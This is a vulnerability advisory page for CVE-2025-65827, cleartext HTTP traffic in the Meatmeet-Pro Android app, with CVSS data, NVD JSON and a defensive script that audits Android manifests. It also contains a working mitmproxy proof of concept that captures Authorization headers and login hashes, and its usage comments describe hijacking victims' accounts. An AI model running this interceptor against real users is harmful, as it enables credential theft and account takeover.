Security Vulnerability Report
CVE-2025-65827 CVSS 9.1 CRITICAL

CVE-2025-65827

Published: 2025-12-10 21:16:08
Last Modified: 2025-12-30 19:09:32

Description

The mobile application is configured to allow clear text traffic to all domains and communicates with an API server over HTTP. As a result, an adversary located "upstream" can intercept the traffic, inspect its contents, and modify the requests in transit. This may result in a total compromise of the user's account if the attacker intercepts a request with active authentication tokens or cracks the MD5 hash sent on login.
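The check below is an added example, not code from the advisory or the vendor: it audits a decoded `AndroidManifest.xml` and, where one exists, the network security config for the "clear text traffic to all domains" setting described above. The sample XML is constructed, and `audit_cleartext` and its `target_sdk` parameter are hypothetical names introduced here.

```python
import xml.etree.ElementTree as ET  # for untrusted APKs, prefer the defusedxml package

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample inputs (not taken from the affected application).
WEAK_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <application android:usesCleartextTraffic="true"/>
</manifest>"""
DEFAULT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <application/>
</manifest>"""
WEAK_NSC = """<network-security-config>
  <base-config cleartextTrafficPermitted="true"/>
</network-security-config>"""
# Cleartext denied by default, with one explicit per-domain exception.
SCOPED_NSC = """<network-security-config>
  <base-config cleartextTrafficPermitted="false"/>
  <domain-config cleartextTrafficPermitted="true">
    <domain includeSubdomains="false">localhost</domain>
  </domain-config>
</network-security-config>"""


def audit_cleartext(manifest_xml, nsc_xml=None, target_sdk=28):
    """Return findings describing where cleartext (HTTP) traffic is permitted.

    nsc_xml is the file named by android:networkSecurityConfig, if any.
    target_sdk decides the platform default: permitted up to 27, denied from 28.
    """
    findings = []
    default_on = target_sdk <= 27
    if nsc_xml is None:
        app = ET.fromstring(manifest_xml).find("application")
        flag = app.get(ANDROID + "usesCleartextTraffic") if app is not None else None
        if flag == "true" or (flag is None and default_on):
            findings.append("manifest: cleartext permitted to all domains")
        return findings
    # When a network security config exists (API 24+), it overrides the manifest flag.
    nsc = ET.fromstring(nsc_xml)
    base = nsc.find("base-config")
    value = base.get("cleartextTrafficPermitted") if base is not None else None
    if value == "true" or (value is None and default_on):
        findings.append("base-config: cleartext permitted to all domains")
    # Only domain-configs that set the attribute explicitly are reported here.
    for dc in nsc.iter("domain-config"):
        if dc.get("cleartextTrafficPermitted") == "true":
            names = ", ".join((d.text or "").strip() for d in dc.findall("domain"))
            findings.append("domain-config: cleartext permitted to " + names)
    return findings
```

An empty result means cleartext is denied everywhere; a per-domain finding still deserves review, since any HTTP endpoint carrying tokens or login hashes has the exposure described above.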

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:meatmeet:meatmeet:1.1.2.0:*:*:*:pro:android:*:* - VULNERABLE
Meatmeet-Pro mobile application (all versions with clear text traffic enabled)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-65827 PoC - Clear Text Traffic Interception

This PoC demonstrates how an attacker can intercept clear text HTTP traffic
from a vulnerable mobile application.
"""
# Written as a mitmproxy addon: load it with mitmproxy's -s option, e.g.
#   mitmdump -s <this_file>.py --listen-host 0.0.0.0 --listen-port 8080
# (add --mode reverse:http://target-api-server.com for reverse-proxy mode).
from mitmproxy import http


class CVE202565827Interceptor:
    def __init__(self):
        self.intercepted_requests = []

    def request(self, flow: http.HTTPFlow):
        """Intercept HTTP requests from the vulnerable mobile app"""
        # Check if the request is over HTTP (not HTTPS)
        if flow.request.scheme == 'http':
            print(f"[*] Intercepted HTTP Request: {flow.request.url}")
            print(f"[*] Method: {flow.request.method}")
            print(f"[*] Headers: {dict(flow.request.headers)}")

            # Extract authentication tokens or MD5 hashes
            if 'Authorization' in flow.request.headers:
                auth_header = flow.request.headers['Authorization']
                print(f"[!] Found Authorization Header: {auth_header}")
                self.intercepted_requests.append({
                    'url': flow.request.url,
                    'auth': auth_header
                })

            # Log request body (may contain MD5 hash)
            if flow.request.content:
                print(f"[*] Request Body: {flow.request.content.decode('utf-8', errors='ignore')}")

    def response(self, flow: http.HTTPFlow):
        """Log intercepted responses"""
        if flow.response and flow.response.content:
            print(f"[*] Response from server: {flow.response.content[:200]}")


# mitmproxy instantiates the addons listed here when the script is loaded.
addons = [CVE202565827Interceptor()]

# Usage:
# 1. Set up this proxy on the attacker's machine
# 2. Configure victim's mobile device to route traffic through this proxy
# 3. Intercept and analyze HTTP traffic
# 4. Extract authentication tokens or MD5 hashes
# 5. Use extracted credentials to hijack user accounts
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65827", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:08.473", "lastModified": "2025-12-30T19:09:32.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mobile application is configured to allow clear text traffic to all domains and communicates with an API server over HTTP. As a result, an adversary located \"upstream\" can intercept the traffic, inspect its contents, and modify the requests in transit. TThis may result in a total compromise of the user's account if the attacker intercepts a request with active authentication tokens or cracks the MD5 hash sent on login."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:meatmeet:meatmeet:1.1.2.0:*:*:*:pro:android:*:*", "matchCriteriaId": "5728B254-9D91-4EA1-9C7B-B4957DE1D77D"}]}]}], "references": [{"url": "https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-clear-text-traffic-enabled-md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Clear-Text-Traffic-Enabled.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}